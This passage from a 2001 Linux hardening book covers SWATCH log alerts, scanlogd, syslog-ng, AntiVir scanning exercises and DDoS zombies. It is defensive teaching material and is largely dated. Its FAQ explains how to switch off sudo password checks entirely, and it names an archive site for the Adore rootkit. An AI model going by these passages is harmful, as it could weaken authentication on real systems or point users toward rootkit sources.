authentication event +occurs.It can monitor and alter when system halts and reboots occur,when a +user upgrades to root using the su command,when the file system is full,and +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 98 +98 Chapter 2 • Hardening the Operating System +when someone is sniffing the system.It can monitor anything desired from the +log files. +To learn about SWATCH and download the program,you need to visit the +SWATCH home page (Figure 2.26) at www.stanford.edu/~atkins/swatch or at +www.engr.ucsb.edu/~eta/swatch.This RPM is also available on the accompa- +nying CD (swatch-3.064-1.noarch.rpm). +Figure 2.26 SWATCH Home Page +NOTE +At the time of this writing, version 3 of SWATCH was available for down- +load. It has a different configuration file format than previous versions, +and much of the code has been rewritten to take advantage of Perl 5. If +you use previous configuration files, you must use the --old-style-config +switch during configuration. +SWATCH uses two required fields:pattern(s) and action(s). +(cid:2) Patterns The SWATCH configuration file looks for patterns in logging +entries.For example,bad login attempts display a “Failed Authentication” +error. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 99 +Hardening the Operating System • Chapter 2 99 +(cid:2) Actions Whenever a pattern is discovered,SWATCH seeks an action, +such as e-mailing the administrator of the failed login attempt. +Two optional fields are used to further customize the configuration file: +(cid:2) Throttle Throttle determines the amount of time that SWATCH will +ignore repeated logged entries before listing the entry again.This saves +administrators time from viewing 300 identical “Failed Authentication” +errors.However,a secure system should limit the number of login +attempts.The throttle entry is defined as HH:MM:SS,where H repre- +sents hours,M represents minutes,and S represents seconds. +(cid:2) Timestamp Timestamp defines the length and location of the time- +stamp.The timestamp entry is defined as start:length. +The following are two examples from the SWATCH configuration file. +SWATCH will actively watch for these messages as they are written to their +respective log files through the syslog utility.The first example monitors logging +for failed login attempts and e-mails root when a failed login attempt occurs. +#Failed login attempts +watchfor /failed/ +echo bold +mail addresses=root,subject=Failed Authentication +The second example monitors your log files and e-mails root when a user +sued to gain root access. +#Users sued to gain root access +watchfor /su:/ +echo bold +mail addresses=root,subject=User sued to root +SWATCH filters logging files so that administrators only receive the informa- +tion they require.It saves a lot of time and trouble once configured and is recom- +mended for system administrators who are overwhelmed by log files (and perhaps +do not use them for that reason).To download an RPM version of SWATCH, +visit www.rpmfind.net. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 100 +100 Chapter 2 • Hardening the Operating System +Scanlogd +Scanlogd is an open source program that detects and logs TCP-port scanning on a +system.For example,it can detect nmap scans.Nmap is a program used by hackers +to create a “map”of your network.It is often the first step a hacker takes once he +or she has access to your network to determine which system to hack.Nmap lists +the systems and the services on the network.Scanlogd can alert an administrator +when the network is being mapped,but it cannot stop the intrusion. +SECURITY ALERT! +Scanlogd was originally designed to illustrate attacks, not to fix them. +Therefore, even though it is safe to run on your system, it does not pre- +vent hacking attacks. You must read the system log to discover what +happened to your system, and then determine the appropriate solution. +Scanlogd writes one line per scan using the syslog(3) mechanism.It also logs +when a source address sends many packets to several different ports in a short +amount of time.You can learn about scanlogd and download the program at +www.openwall.com/scanlogd.The scanlogd home page is shown in Figure 2.27. +Figure 2.27 Scanlogd Home Page +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 101 +Hardening the Operating System • Chapter 2 101 +Because scanlogd is only meant to detect scans,it is totally safe to run on +your system.It must have access to raw IP packets to function,and can capture +packets coming in and out of the system interface,or across the network to +which the system is attached.In addition,scanlogd v2 supports the raw socket +interface on libnids,libpcap,and Linux. +Syslogd-ng +Syslogd-ng is a logging daemon that is the replacement for the traditional syslogd. +The “ng”is an acronym for “next generation.”The original syslogd was the gen- +eral Unix logging daemon that handled requests for syslog services,but was diffi- +cult to configure.Syslogd-ng is easier to configure and offers additional logging +features,such as more configurations.For example,syslogd-ng allows administra- +tors to filter messages based on priority,as well as the content of the messages. +You can also forward logs on TCP,sort logs to different destinations,and create a +direct log stream to various hosts.It will eventually support log files that are pro- +tected with hash encryption.The syslog-ng home page is shown in Figure 2.28 +and is located at www.balabit.hu/en/products/syslog-ng. +Figure 2.28 Syslog-ng Home Page +The basic problem with system logs is that they contain a lot of unimportant +information.This information is often called noise.Many events are lost because +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 102 +102 Chapter 2 • Hardening the Operating System +they are buried in the noise.Syslogd made it difficult to choose only the important +messages. +The reason this occurs is that messages are sent to different destinations +depending on the assigned facility/priority pair.These destinations are very +broad,and include general facilities such as mail,news,auth,and so forth,and +priorities ranging from alert to debug.Many programs use the facilities,so many +unneeded messages are written to their logs.In many cases,the message and the +facility are not even related.Syslogd-ng filters messages based on message content +in addition to the facility/priority pair.Using this method,only the messages that +are needed are logged. +Syslogd-ng has been tested on Linux,BSDi,and Solaris.At the time of this +writing,the latest stable version was 1.4.10.You can learn more about syslog-ng +and download it from the Balabit site at www.balabit.hu/en/products/syslog-ng/ +downloads.The site also contains information on installing and configuring the +service. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 103 +Hardening the Operating System • Chapter 2 103 +Summary +This chapter covered the basics of hardening a server to avoid security vulnerabil- +ities using Linux.The main sections covered disabling unnecessary services, +locking down ports,Bastille,sudo,and logging enhancers. +It is extremely important to install the latest service pack or updates to the +operating system,which fix many security vulnerabilities and bugs before you +install any programs.Many services provided with operating systems are not +required and can be removed.The key to remember is that the fewer services +running,the less potential vulnerability.TCP/UDP ports were covered in this +chapter,and how each port is used by specific services.If you block ports on +your server,you block the services that use those ports.Locking down ports is an +excellent way to reduce exploitations of your system. +Maintaining your server involves downloading service packs and updates,and +requires regularly installing bug fixes,security patches,and software updates.These +items are available through the operating system vendors,as well as the specific +vendors that created the software that you implement. +Bastille is an open source program that facilitates the hardening of a Linux +system.It performs many of the tasks listed previously,including downloading +operating system updates and disabling services and ports that are not required for +the system’s job functions.Bastille is powerful and can save administrators time +from configuring each individual file and program throughout the operating +system.Instead,administrators answer a series of “Yes”and “No”questions +through an interactive text-based interface.The program automatically imple- +ments the administrators’preferences based on the answers to the questions. +Superuser Do (sudo) is an open source security tool that allows an adminis- +trator to give specific users or groups the ability to run certain commands as root +or as another user.The program can also log commands and arguments entered +by specified system users.The developers of sudo state that the basic philosophy +(www.courtesan.com/sudo/readme.html) of the program is to “give as few privi- +leges as possible,but still allow people to get their work done.” +Logging enhancers are tools that simplify logging by allowing logging infor- +mation to be filtered and often displaying logs in simplified formats.Many open +source logging programs exist to make system administration easier.You were +introduced in this chapter to SWATCH,scanlogd,and syslog-ng. +SWATCH is an open source package that allows administrators to efficiently +monitor system activity.It can monitor events on a system,or a large number of +systems,by monitoring system logs for specified events.SWATCH’s main function +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 104 +104 Chapter 2 • Hardening the Operating System +is to monitor messages actively as they are written to log files through the Unix +syslog utility. +Scanlogd is an open source program that detects and logs TCP-port scanning +on a system.Scanlogd can alert an administrator when the network is being +mapped,but it cannot stop the intrusion. +Syslogd-ng is a logging daemon that is the replacement for the traditional +syslogd.The “ng”is an acronym for “next generation.”The original syslogd was +the general Unix logging daemon that handled request for syslog services,but +was difficult to configure.Syslogd-ng is easier to configure and offers additional +logging features,such as more configurations.For example,syslogd-ng allows +administrators to filter messages based on priority,as well as the content of the +messages. +Solutions Fast Track +Updating the Operating Systems +(cid:59) Operating system releases usually contain software bugs and security +vulnerabilities. +(cid:59) Operating system vendors or organizations offer fixes,corrections,and +updates to the system.For example,Red Hat offers this material at its +Web site,which includes Update Service Packages and the Red Hat +Network. +(cid:59) You should always ensure your system has the latest necessary upgrades. +Many errata and Update Service Packages are not required for every +system.You should always read the associated documentation to deter- +mine if you need to install it. +Handling Maintenance Issues +(cid:59) After your system goes live,you must always maintain it by making sure +the most current patches and errata are installed,which include the fixes, +corrections,and updates to the system,as well as the applications run- +ning on it. +(cid:59) You should always check the Red Hat site at www.redhat.com/apps/ +support/updates.html for the latest errata news. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 105 +Hardening the Operating System • Chapter 2 105 +(cid:59) For example,Red Hat security advisories provide updates that eliminate +security vulnerabilities on the system.Red Hat recommends that all +administrators download and install the security upgrades to avoid +denial-of-service (DoS) and intrusion attacks that can result from these +weaknesses. +Manually Disabling Unnecessary Services and Ports +(cid:59) You should always disable vulnerable services and ports on your system +that are not used.You are removing risk when you remove unnecessary +services. +(cid:59) The /etc/xinetd.d directory makes it simple to disable services that your +system is not using.For example,you can disable the FTP and Telnet +services by commenting out the FTP and Telnet entries in the respective +file and restarting the service.If the service is commented out,it will not +restart. +Locking Down Ports +(cid:59) When determining which ports to block on your server,you must first +determine which services you require.In most cases,block all ports that +are not exclusively required by these services. +(cid:59) To block TCP/UDP services in Linux,you must disable the service that +uses the specific port. +Hardening the System with Bastille +(cid:59) The Bastille program facilitates the hardening of a Linux system.It saves +administrators time from configuring each individual file and program +throughout the operating system. +(cid:59) Administrators answer a series of “Yes”and “No”questions through an +interactive text-based interface.The program automatically implements +the administrators’preferences based on the answers to the questions. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 106 +106 Chapter 2 • Hardening the Operating System +(cid:59) Bastille can download and install RPM updates,apply restrictive permis- +sions on administrator utilities,disable unnecessary services and ports, +and much more. +Controlling and Auditing Root Access with Sudo +(cid:59) Sudo (Superuser Do) allows an administrator to give specific users or +groups the ability to run certain commands as root or as another user. +(cid:59) Sudo features command logging,command restrictions,centralized +administration of multiple systems,and much more. +(cid:59) The sudo command is used to execute a command as a superuser or +another user.In order to use the sudo command,the user must supply a +username and password.If a user attempts to run the command via sudo +and that user is not entered in the sudoers file,an e-mail is automatically +sent to the administrator,indicating that an unauthorized user is +accessing the system. +Managing Your Log Files +(cid:59) Logging allows administrators to see who and what has accessed their +system.Many helpful Linux log files are located in the /var/log directory. +(cid:59) Linux offers commands that allow administrators to access useful log +files.Two commands of interest are last and lastlog.The message file also +offers useful data for determining possible security breaches on your +system. +(cid:59) The Linux logs should be checked frequently to determine if any secu- +rity violations have occurred on your system.Logs do not offer solu- +tions,so you must analyze the data and decide how to counteract the +attack. +Using Logging Enhancers +(cid:59) Logging enhancers are tools that simplify logging by allowing logging +information to be filtered and often displaying logs in simplified formats. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 107 +Hardening the Operating System • Chapter 2 107 +(cid:59) Viewing text-based files with hundreds or thousands of entries can be +burdensome,especially if you are only looking for one specific error +entry. +(cid:59) Three popular logging services used by administrators are SWATCH, +scanlogd,and the next generation of syslogd (syslogd-ng). +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q: I have a server that is strictly a mail server and uses SMTP and POP3. +However,I want to download security patches from my vendor’s Web site +directly to the server.Even though I open the TCP/UDP port 80 (HTTP) +and port 53 (DNS),I am unable to download the patches on the mail server. +A: If security is a priority,you should order update CDs through your vendor, +such Red Hat’s Update Service Packages,and install them via your CD drive. +You can also simply download your updates from another system on your +network. +Q: Should I place my e-mail server behind the firewall,or in a service network +(that is,a “demilitarized zone”)? +A: Standard practice is to place the e-mail server in the DMZ.A DMZ is usually +comprised of a screening router that blocks most attacks (denial-of-service, +system scanning,attacks against Microsoft NetBIOS ports,etc.),and a firewall +device that authoritatively blocks incoming traffic,effectively separating the +internal network from the world.The DMZ exists between the screening +router and the firewall.However,it is often a best practice to place the e-mail +server behind the firewall itself.If you do this,however,you must make sure +your firewall is configured correctly.Otherwise,a malicious user can take +advantage of a misconfigured firewall and gain access to your internal network. +www.syngress.com + +138_linux_02 6/20/01 9:34 AM Page 108 +108 Chapter 2 • Hardening the Operating System +Q:When I install Bastille and run configure,why does the program report that +the C compiler cannot create an executable? +A:This error most likely indicates that your system does not have a functioning +compiler.If often occurs because you do not have a license,or part of the +compiler suite cannot be located.Access and view the config.log to deter- +mine the cause.Many compiler components are found in /usr/css/bin.This +path may not be identified in the environment variable PATH. +Q: By default,sudo uses syslog(3) for logging.Since I did not change this default +during setup,why am I not generating any logging messages? +A: In order to generate sudo log files,you need to create a /var/log/sudo file, +and add an entry to the syslog.conf file.Since the default log facility is local2, +you must add the following line with TAB keys separating the facility +(local2.debug) from the destination (a local logging file). +local2.debug /var/log/sudo +You must then restart syslogd to ensure that it re-reads the file. +Q: I am tired of entering my password in sudo each time my ticket expires. +How can I avoid this hassle? +A: Use the NOPASSWD tag in sudoers for specific users and commands by +inserting the tag before the command list.If you want to disable all sudo pass- +words,there are two methods.You can run configure with the --without- +passwd option,or you can add !authenticate to the Default line in sudoers. +Finally,you can disable passwords to users and hosts in sudoers by adding spe- +cific user or host Defaults entries.See the sudo man file for specifics on dis- +abling sudo password prompts. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 109 +Chapter 3 +System Scanning +and Probing +Solutions in this chapter: +(cid:2) Scanning for Viruses Using the AntiVir +Antivirus Application +(cid:2) Scanning Systems for DDoS Attack +Software Using a Zombie Zapper +(cid:2) Scanning System Ports Using the Gnome +Service Scan Port Scanner +(cid:2) Using Nmap +(cid:2) Using Nmapfe as a Graphical Front End +(cid:2) Using Remote Nmap as a Central +Scanning Device +(cid:2) Deploying Cheops to Monitor +Your Network +(cid:2) Deploying Nessus to Test Daemon Security +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +109 + +138_linux_03 6/20/01 9:35 AM Page 110 +110 Chapter 3 • System Scanning and Probing +Introduction +You now have hardened your system using open source tools.Changes are con- +stantly made to production systems.In addition,malicious users are constantly +discovering and exploiting new weaknesses.This chapter discusses ways to scan +your systems for weaknesses that may already exist or may develop.You will learn +how to scan your hard drive,and then scour running processes to determine if +any problems exist. +Finally,you will learn how to deploy the Nessus scanner to test for common +server weaknesses.By the end of this chapter,you will have a system that is rea- +sonably secure,and can actually test additional servers for vulnerabilities. +Scanning for Viruses Using the +AntiVir Antivirus Application +The AntiVir for Servers binary is a truly impressive command-line virus scanner +sold by H+BDEV.It is capable of searching for the latest Linux viruses,and once +you purchase the product,you can obtain daily virus definition updates.Although +AntiVir is not part of the GNU GPL,it is nevertheless free to use.You can obtain +AntiVir from either of the following locations: +(cid:2) www.hbedv.com The main distribution site. +(cid:2) www.freshmeat.net This site has only information about the daemon +and links to the AntiVir site. +Understanding Linux Viruses +You may be thinking to yourself,“Come on,who ever heard of a Linux virus?” +It is true that Linux viruses are far less common than those in the Windows +world are,but in fact,Linux viruses are becoming increasingly common. +For example,the Linux/Bliss virus (also known as the “Bliss”or simply as the +“Linux virus,”can infect standard Linux Executable and Linking Format (ELF) +binaries.It can also spread to other systems all by itself,which means that it is acts +like a worm,a program that can replicate itself from system to system without any +user intervention.Understand,however,that the way this virus replicates itself is +by searching for /etc/hosts.equiv files and then exploiting them.If you have +deployed Bastille,you likely will not have any problem. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 111 +System Scanning and Probing • Chapter 3 111 +NOTE +Executable and Linking Format (ELF) is a binary executable file format +standardized by commercial Unix systems and adopted by Linux. In +Linux, executable files are called ELF-style files. Other link formats that +may be supported by your kernel include common object file format +(COFF) and the now deprecated a.out format. +This virus can actually replace the ELF binaries that allow write access with +its own binaries.When the hapless user (or system) tries to execute these infected +binaries,it will not be able to do so.Consequently,elements of the system will +crash.Additional viruses and Trojans exist,including Loadable Kernel Module +(LKM) root kits.LKM root kits work by installing hidden Linux modules and +replacing legitimate applications with those designed to ignore Trojan processes. +Your updated version of AntiVir should capture many of these Trojans.LKM- +based root kits such as Adore (available at various sites,including http://packet- +storm.securify.com) are particularly powerful and difficult to find,however.In +many cases,a system reinstall is necessary to ensure that the compromised system +is again secure. +Linux viruses do exist,and the very presence of Linux viruses and virus scan- +ners such as AntiVir and others suggests that Linux could stand to do some more +maturing as a product.However,management can now take Linux seriously,now +that you can answer “yes”to the question,“Can you protect this system against +viruses?”After all,what good manager would really believe that your Linux +system is magically impervious to virus attacks? For example,AntiVir will find +(and,if so ordered,delete) the following virus types: +(cid:2) Macro viruses Viruses that exist in complex documents,such as Word +and StarOffice files. +(cid:2) Boot sector viruses Small programs that infect system initialization +files (that is,the files that the system uses to boot up). +(cid:2) E-mail viruses AntiVir scans for all of the latest e-mail viruses, +including the Anna Kournikova virus. +(cid:2) Distributed denial-of-service (DDoS) daemons AntiVir scans for +DDoS daemons,such as Tribe Flood Network 2000. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 112 +112 Chapter 3 • System Scanning and Probing +You can learn more about the currently available antivirus products at +www.cn.is.fh-furtwangen.de/~link/security/av-linux_e.txt.As of this writing, +the Packetstorm site has an extensive collection of antivirus applications at +http://packetstorm.securify.com/viral-db/avp-linux. +Using AntiVir +As with any other virus scanner,AntiVir can do the following: +(cid:2) Check the system’s boot record. +(cid:2) Search directories and subdirectories. +(cid:2) Automatically delete infected files. +(cid:2) Save scans into a log file. +(cid:2) Use an internal scheduler,or an external scheduler,such as at or cron. +(cid:2) Scan NFS-mounted drives. +(cid:2) Delete infected files. +(cid:2) Move infected files to a central “quarantine”area of your own choosing. +AntiVir scans the files you specify using its virus definition file,which is +located at /usr/lib/AntiVir/antivir.vdf.Run without arguments,AntiVir will scan +only the current directory.For a more extensive scan,you must specify arguments +to change this default behavior.For example,to have AntiVir scan the /var/log/ +directory,you would have to issue the following command: +antivir /var/log -s -allfiles -s -nolnk -r4 +You can review all of the command-line options by issuing the antivir -h +command,which is handy when you have forgotten exactly how to use the pro- +gram.Figure 3.1 shows all of the command-line options available to you. +Table 3.1 lists some of the more relevant arguments to AntiVir. +Table 3.1 AntiVir Options +Argument Description +-allfiles Scans all files in the directory. +-z Scans archived files. +-onefs Scans only locally mounted drives (does not scan +NFS-mounted drives). +Continued +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 113 +System Scanning and Probing • Chapter 3 113 +Table 3.1 Continued +Argument Description +-del Removes infected files. +-r4 Places AntiVir into verbose mode, which means that you will +be able to see extensive output. If you choose to save logs of +the scan, your logs will also contain this information. +-ro Overwrites the existing log file. +-ra Appends new scan information to the existing log file. +-rf Allows you to specify the location and name of the log file +(e.g., /root/antivirlog.txt). +-s Recursively scans all subdirectories. +Figure 3.1 Command-Line Arguments +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 114 +114 Chapter 3 • System Scanning and Probing +Key Mode and Non-Key Mode +AntiVir is sold by a for-profit company,and it gives you some licensing options +when running the program.First,you can run the program without any license +at all.This will place the program into “non-key mode,”which limits the pro- +gram so that the -s,-nolnk,and -onefs options will not work.Consequently, +you will not be able to,for example,tell AntiVir to search the entire drive by +issuing the following command: +antivir / -s -allfiles -s -nolnk -r4 +Licensing AntiVir +If you plan to use this application for private use,you can download and install +the program,and then apply for a private license at www.antivir.de/order/ +privreg/order_e.htm. +Eventually,you will receive a license file named hbedv.key.Once you have +this license,you must place it in the /usr/lib/AntiVir directory.Once you start +(or restart) AntiVir,you can use all of the options the program has to offer. +Exercise: Updating AntiVir +An antivirus application is only as useful as its virus definition file.If you are run- +ning in non-key mode,you cannot install any updates for AntiVir.Those who +legally obtain and use the private license are entitled to one update every two +months.If you purchase AntiVir,you can obtain daily updates. +To obtain an update,go to www.hbedv.com/download/download.htm and +download the appropriate .vdf file for your application.Once you obtain a key, +place it in the /usr/lib/AntiVir/ directory. +Installing version 6.6.0.0 of AntiVir is simplicity itself.This exercise assumes +that you have already downloaded and registered AntiVir. +1. Create a directory named antivir. +2. Obtain the file named avlxsrv.tgz from the CD that accompanies this +book and place it in the antivir directory.Normally,when a tarball is +unzipped,the package will create its own directory.However,this isn’t +the case with AntiVir.You can also install the Red Hat Packet Manager +(RPM) if you wish. +3. Issue the following command:tar -zxvf avlxsrv.tgz. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 115 +System Scanning and Probing • Chapter 3 115 +4. Several files will be generated,including the install.sh script.Issue the +following command,exactly as shown: +./install.sh +5. The preceding command tells the system to run the install.sh script. +Upon doing so,you will see that the program creates the /usr/lib/ +AntiVir directory.You will be asked if you want to create a symbolic link +(the program uses the word symlink.Press y to indicate yes.The symbolic +link this creates is from the /usr/lib/AntiVir/antivir directory to the +/usr/bin directory.Establishing this symbolic link allows AntiVir to start +without you having to enter the entire path (e.g.,/usr/bin/antivir). +NOTE +A symbolic link is similar to a Windows shortcut, although more powerful. +It is a reference to another file system object on any file system (on the +local system or on another network) supported by Linux. In Unix, you can +create a symbolic link that leads to a binary by using the ln -s command: +ln -s existingItem newItem +6. You have now installed AntiVir.However,you still cannot use all of +AntiVir’s options.Now,open a browser and go to www.antivir.de/ +order/privreg/order_e.htm. +7. Enter the relevant information,and then order your key.The key will be +sent to you in a few minutes. +8. Once you obtain the key,copy it to the /usr/lib/AntiVir/ directory.Now, +scan your local directory for a virus by issuing the following command: +antivir +9. The system will load its file (/usr/lib/AnviVir/antivir.vdf),and then scan +the directory.In all likelihood,it will find nothing.Now,scan all files +and all subdirectories in your home directory: +antivir /root -allfiles -s +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 116 +116 Chapter 3 • System Scanning and Probing +10. Thus far,AntiVir hasn’t been very forthcoming about what it finds.Also, +notice how all output goes onto the screen,rather than to a log file.You +can change this by issuing the following command: +antivir ~ -allfiles -s -r4 -rf/log.txt -ro +This command has AntiVir go into verbose mode,and then deposit +all of its standard output into a file in your current directory named +log.txt.The -ro command will erase any file named log.txt and replace +it with what it finds.If you want to append information to the end of +the log.txt file,instead of overwriting it,use the -ra option. +11. The following command,for example,searches the var/spool/ directory, +which can contain mail files: +"/var/spool/*" -s -rf/log.txt -ro +12. Now,change to the /etc/cron.daily directory. +13. Using a text editor such as vi or pico,create a file named antivir.cron, +and enter the following code: +#!/bin/sh +antivir / -allfiles -s -r4 -rf/root/log.txt -ro +This command has crontab run AntiVir so that it scans the entire +hard drive for viruses,and then creates a log file named log.txt in the +/root directory.Because you have created this cron entry in the +/etc/cron.daily/ directory,the job will be run every day. +To learn more about AntiVir options,consult the README file that comes +with the program.You can also learn more about the program by typing antivir +-h and scrolling through the options. +Using TkAntivir +The command-line interface is very useful when you want to administer the +system quickly,or when you have to remotely administer a system using SSH or +Telnet.However,a rather elegant GUI front end called TkAntivir is available for +free at the Geiges Software Training and Consulting Web page at www.geiges.de/ +tkantivir or from the accompanying CD (tkav.gz or the equivalent tkantivir-1.30- +1.i386.rpm. +When you download TkAntivir,make sure that you obtain the version that +supports your language.The program was developed in Germany,and if you are +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 117 +System Scanning and Probing • Chapter 3 117 +not careful,you will install the German language version,rather than the +English version. +Required Libraries and Settings +Before you try to install TkAntivir,you must have the following libraries and +settings: +(cid:2) Tcl/Tk version 8.x or higher Most systems already have Tcl/Tk +installed,but you may have to upgrade the version on your system.A +default installation of Red Hat 7.0 has adequate versions of this library +already installed. +(cid:2) A resolution of at least 800 x 600 You may have to run +Xconfigurator or XF86Setup to reconfigure your X settings. +NOTE +Although TkAntivir is designed to run in any X-Windows environment, it +runs best in KDE, which is not surprising, since the KDE interface was +first developed in Germany. The application runs on the Gnome desktop +as well. You can download Gnome at www.gnome.org. If you are run- +ning certain versions of the Blackbox window manager, TkAntivir will go +through the loading procedure, but will not run. Try running KDE or +Gnome to solve this problem. +You have the option of installing TkAntivir using tarball or RPM packages.In +this particular instance,Red Hat systems seem to respond better to the RPM. +Scanning Systems for Boot Sector and E-Mail Viruses +The TkAntivir interface,shown in Figure 3.2,is relatively intuitive and allows you +to concentrate on what you want AntiVir to do,as opposed to getting the com- +mand-line syntax correct.The Scanning options section allows you to specify the +path you wish to search.You can also use this section to search only for certain +file types,which is useful when scanning e-mail spooling directories for suspect +attachments.The Options section allows you to skip checking the system boot +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 118 +118 Chapter 3 • System Scanning and Probing +record and symbolic links,which helps the scan finish faster,because it won’t +have to scan the same file repeatedly.This section also allows you to specify +whether you want to search for compressed files (e.g.,files compressed by zip or +gzip).Verbose scan mode allows you to receive more information in your log file. +Figure 3.2 The TkAntivir Interface +The Repair options section allows you to determine what AntiVir will do +when it finds a virus.Notice that it is set to ignore by default,which is wise.Virus +applications,like any scanning or monitoring application,are susceptible to false +positives,which are instances when an application identifies a perfectly benign +file,process,or activity as somehow threatening.If you tell AntiVir to delete any +file that it thinks is defective,and AntiVir makes a mistake,you may end up +deleting an important system file,or removing a user’s important report.Either +way,you could cause problems for yourself if you automate file removal. +Finally,the Macro repair options section allows you to determine what will be +done with macros created by various applications,including Microsoft Word.If, +for example,you have a Linux server acting as a file and print server,you may +want to consider some of these options.Again,remember that mistakenly +deleting files can cause serious problems because Unix/Linux has no native +undelete facility. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 119 +System Scanning and Probing • Chapter 3 119 +The Scan icon,at the upper-left portion of the interface,allows you to acti- +vate the settings you enter.The Scheduler icon brings up the Scheduler interface, +shown in Figure 3.3.From here,you can: +(cid:2) Choose the path that a particular job will scan. You can also +include subdirectories. +(cid:2) Tell AntiVir when it should run. You can schedule a one-time +event,or schedule AntiVir to run every day,every week,or after a cer- +tain number of days.Figure 3.3 shows that a job is scheduled to run at +2:00 A.M. each week.The job will run on Monday of each week.If you +click Single Events,you will be able to configure AntiVir to run at a +certain time on the same day,or the next day,or after a certain number +of days.Once you are finished configuring the time,you can then click +Add a Job.You can also review and update existing jobs,simply by +highlighting the existing job and then clicking either Job Info or +Update. +Figure 3.3 Scheduling a Scan +The Report Viewer icon allows you to view reports generated earlier,or +reports generated on other systems.Once you click this icon,you will see the +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 120 +120 Chapter 3 • System Scanning and Probing +Open dialog box,shown in Figure 3.4.Once this dialog box opens,you can then +navigate to the log file you want to read,and then open it. +Figure 3.4 The Open Dialog Box in TkAntivir +Additional Information +The Preferences tab allows you to change the location of AntiVir binary,the +TkAntivir files,or the log file.The AntiVir and VDV info file allows you to deter- +mine when it is time to download and install a new .vdf file.Now that you are +familiar with the requirements for TkAntivir,it is time to install and use it. +Exercise: Using TkAntivir +1. Make sure that you have all of the required libraries.Review this section +for more details. +2. Verify that you have 800 x 600 resolution.Consult your man pages for +Xconfigurator or XF86Setup.You can also directly edit your X- +Windows configuration file (XF86Config). +3. Download and install TkAntivir from www.geiges.de/tkantivir.Although +your situation may vary,the RPM file works best on Red Hat systems. +Once you obtain the RPM file,check its MD5 signature,and then +install it using the rpm -ivh command. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 121 +System Scanning and Probing • Chapter 3 121 +4. Enter the following command to create a log file directory off of the +/usr/lib/AntiVir/log/ directory: +mkdir /usr/lib/AntiVir/log/ +5. Once you install TkAntivir,run the program by issuing the tkantivir +command. +6. You will see a dialog box informing you that the configuration is not +complete.Click OK to bring up the configuration window.Enter the +information shown in Figure 3.5.Make sure that you enter this text +exactly as shown—Linux systems are always case sensitive. +Figure 3.5 Setting Preferences for TkAntivir +7. Click OK.You will see the splash screen shown in Figure 3.6. +Figure 3.6 The TkAntivir Splash Screen +8. You will then see the main interface.If you do not see this interface, +either you need to use KDE or Gnome,or you need to change your +monitor resolution. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 122 +122 Chapter 3 • System Scanning and Probing +9. Once the interface appears,scan your entire directory.Make the changes +shown in Figure 3.7. +Figure 3.7 Configuring TkAntivir to Scan the Entire Home Directory +10. Click the Scan icon.You will see a pop-up window similar to that +shown in Figure 3.8 asking you if you are ready to issue this command. +Figure 3.8 Confirming a Disk Scan with TkAntivir +11. Click Yes.You will then see a window informing you that the scan is +taking place.If the scan takes place very quickly,you likely have not +downloaded and properly installed your key.The scan may take some +time,depending on the speed of your system’s processor and the size of +your hard drive.Once the scan finishes,TkAntivir will generate a report. +Scroll down the report to view all of the files.In the results shown in +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 123 +System Scanning and Probing • Chapter 3 123 +Figure 3.9,AntiVir was able to find two viruses.Your system is now pro- +tected against Linux viruses. +Figure 3.9 Viewing TkAntivir Scanning Results +Scanning Systems for DDoS Attack +Software Using a Zombie Zapper +Since late 1999,many sites have become the victims of devastating denial-of-service +(DoS) attacks.A DoS attack is basically where an attacker finds a way to disable +the services (in this case,the network’s Web sites) so that they cannot be provided +to anyone.In February 2000,a series of attacks against Web sites such as +www.cnn.com,www.ebay.com,and www.amazon.com caused these sites to be +knocked off the Internet. +The specific type of attack waged against the preceding Web sites was unique, +because it involved multiple attacking machines controlled by one attacker. +Because of these attacks,a new security term,a distributed denial of service (DDoS) +attack was born.In a DDoS attack,an attacker instructs several compromised sys- +tems to flood a target system with service requests.The resulting attack can bring +down almost any Web site,or generate so much traffic that an entire network can +no longer communicate with the rest of the Internet. +Attackers are able to wage these DoS attacks by first finding and hacking into +insecure systems on the Internet.Then,they install programs such as Tribe Flood +Network 2000 (Tfn2k),stacheldraht,and others.The compromised systems now +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 124 +124 Chapter 3 • System Scanning and Probing +have illicit programs,called zombies,installed on them.Traditionally,zombies have +been Unix/Linux systems (because it is easy to program network services on +these systems).Prime targets for zombies are computers used by colleges and uni- +versities.There are several reasons for this: +(cid:2) These systems typically have a large number of users—students. +Consequently,it is easy to hide a rogue account/program. +(cid:2) These systems have user populations that change regularly.Again,this +makes it easy to hide zombie programs.In addition,due to the turnover +of students and courses,university networks often do not employ strin- +gent security techniques. +(cid:2) Computers in academic environments typically have access to very high- +speed Internet connections.This makes it possible for the zombie to +blast the system under attack with an especially high volume of traffic. +For additional information about DDoS attacks,consult www.cert.org/ +incident_notes/IN-99-07.html. +How Zombies Work and How to Stop Them +Once a zombie is commanded to attack a victim,it will generally continue the +attack until it is forced to stop.This is where zombie zapper utilities become +useful.Such programs are able to act as clients to the DDoS servers that are +sending packets to victim hosts.Zombie zapping utilities are useful when you 